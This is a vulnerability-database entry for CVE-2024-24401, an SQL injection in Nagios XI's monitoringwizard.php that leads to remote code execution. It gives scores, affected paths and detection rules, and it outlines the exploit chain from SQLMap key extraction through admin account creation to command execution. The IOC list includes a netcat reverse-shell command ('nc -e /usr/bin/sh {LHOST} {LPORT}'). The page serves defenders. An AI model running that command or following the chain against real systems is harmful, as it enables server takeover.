cbcvebase.
CVE-2024-24401
published 2024-02-26

CVE-2024-24401: SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php…

PriorityP273critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
45.88%
98.7th percentile
SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php component.

Affected

1 ranges
VendorProductVersion rangeFixed in
nagiosnagios_xi

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://{IP}/nagiosxi/api/v1/authenticate?pretty=1
urlhttp://{IP}/nagiosxi/login.php?token={token}
path/nagiosxi/config/monitoringwizard.php
cookienagiosxi
commandnc -e /usr/bin/sh {LHOST} {LPORT}
path/nagiosxi/includes/components/ccm/index.php
path/nagiosxi/includes/components/nagioscorecfg/applyconfig.php
path/nagiosxi/includes/components/ccm/command_test.php
urlhttp://{IP}/nagiosxi/api/v1/system/user?apikey={adminKey}&pretty=1
  • Detect SQL injection attempts against monitoringwizard.php via path traversal-style injection marker in the URL (e.g., '/1*' pattern) with parameters update=1&nextstep=2&wizard=mysqlserver
  • Monitor for POST requests to /nagiosxi/includes/components/ccm/index.php with a tfCommand field containing 'nc -e' (netcat reverse shell), indicating post-exploitation command creation
  • Alert on GET requests to command_test.php with cmd=test&mode=test parameters, which triggers execution of attacker-created Nagios commands
  • Detect rapid sequential API calls: POST to /nagiosxi/api/v1/authenticate followed by GET to /nagiosxi/login.php?token= then POST to /nagiosxi/api/v1/system/user with auth_level=admin — indicative of automated admin account creation
  • The exploit targets the 'id' parameter in monitoringwizard.php using SQLMap techniques ET (Error-based and Time-based blind) against the nagiosxi database table xi_users to extract API keys
  • ·The exploit targets Nagios XI version 2024R1.01 specifically; the SQL injection is in the monitoringwizard.php component and requires an authenticated (non-admin) session to exploit
  • ·The exploit hardcodes a mandatory intermediate password change to 'mawk' for the initial low-privilege user before proceeding with SQLMap extraction — detection logic should account for this forced password-change step
  • ·The exploit extracts the 'Nagios Administrator' API key from the xi_users table to create a new admin account via the REST API — the admin key is the pivot point between SQLi and full RCE
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.